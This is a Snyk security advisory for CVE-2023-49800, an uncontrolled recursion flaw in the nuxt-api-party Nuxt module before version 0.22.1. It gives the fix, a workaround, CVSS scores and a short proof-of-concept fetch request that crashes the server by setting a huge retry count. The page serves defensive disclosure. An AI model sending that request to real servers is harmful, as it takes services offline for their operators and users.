Homepage
About Snyk

Uncontrolled Recursion Affecting nuxt-api-party package, versions <0.22.1

Severity

 Recommended
0.0
high
0
10

CVSS assessment made by Snyk's Security Team

    Threat Intelligence

    Exploit Maturity
    Proof of concept
    EPSS
    0.05% (18th percentile)

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications
  • Snyk ID SNYK-JS-NUXTAPIPARTY-6115221
  • published 11 Dec 2023
  • disclosed 9 Dec 2023
  • credit OhB00
Report a new vulnerability Found a mistake?

Introduced: 9 Dec 2023

CVE-2023-49800 Open this link in a new tab
CWE-674 Open this link in a new tab

How to fix?

Upgrade nuxt-api-party to version 0.22.1 or higher.

Overview

nuxt-api-party is a Nuxt 3 module to securely connect with any API

Affected versions of this package are vulnerable to Uncontrolled Recursion due to an abuse on the retry logic in ofetch function. An attacker can cause the server to crash from a stack overflow by sending a crafted request with a high number of retry attempts for a URL known to fail.

Workaround

Limit which options can be passed to ofetch.

PoC 


await fetch("http://localhost:3000/api/__api_party/MyEndpoint", {
    method: "POST",
    body: JSON.stringify({ path: "x:x", retry: 9999999 }),
    headers: { "Content-Type": "application/json" }
})

CVSS Scores

version 3.1
Expand this section

Snyk

7.5 high
  • Attack Vector (AV)
    Network
  • Attack Complexity (AC)
    Low
  • Privileges Required (PR)
    None
  • User Interaction (UI)
    None
  • Scope (S)
    Unchanged
  • Confidentiality (C)
    None
  • Integrity (I)
    None
  • Availability (A)
    High
Expand this section

NVD

7.5 high